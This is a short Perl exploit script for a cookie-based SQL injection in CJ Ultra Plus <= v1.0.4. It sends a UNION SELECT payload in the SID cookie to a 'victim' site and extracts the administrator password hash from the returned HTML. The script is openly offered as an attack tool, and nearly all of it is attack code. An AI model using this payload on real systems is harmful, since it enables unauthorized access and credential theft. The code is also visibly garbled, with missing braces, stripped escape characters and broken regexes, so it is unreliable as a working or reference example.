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CJ Ultra Plus



# CJ Ultra Plus <= v1.0.4 Cookie SQL Injection


# found and coded by -SmoG- /GermAn hAckZ0r

# contact: ICQ - 266836394





# hints: - sometimes the parameter "SID" is different to the normal one...

# - i extract the hash from the html-code... but i was 2 lazy for coding a good working filter

# - salted DES (normaly "aa" will be the salt, but it can be different)

# - ive spend about 1 hour for this source... its my first exploit in perl... so plz be friendly with ur feedback...



# >>> GretzZz 2: - Wesker, China Sun and all other memberZz <<<

use LWP::UserAgent;

if ($#ARGV 1 !=1) {

print "n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###n";

print "found and coded by -SmoG-n";

print "nnUsage: perl -victimn";

print " perl"; #LiVe-Dem0! letZz pwnz the pedophile!!



print "n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###n";

print "nstarting exploit...";



if($target !~ /^http:///)


$target = "http://".$target;


if($target !~ //$/)


$target .= "/";


@header = ('Cookie' => "SID='UNION SELECT b12 from settings/*");

$ua = LWP::UserAgent->new;



$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: Gecko/20080201 Firefox/");

$response = $ua->get($target, @header);

if ($response->is_success)


$temp = $response->content;

if ($temp =~/(.*)SID=(.*);/)



print "nadminhash: "; print $result;





die "Error: ".$response->status_line;


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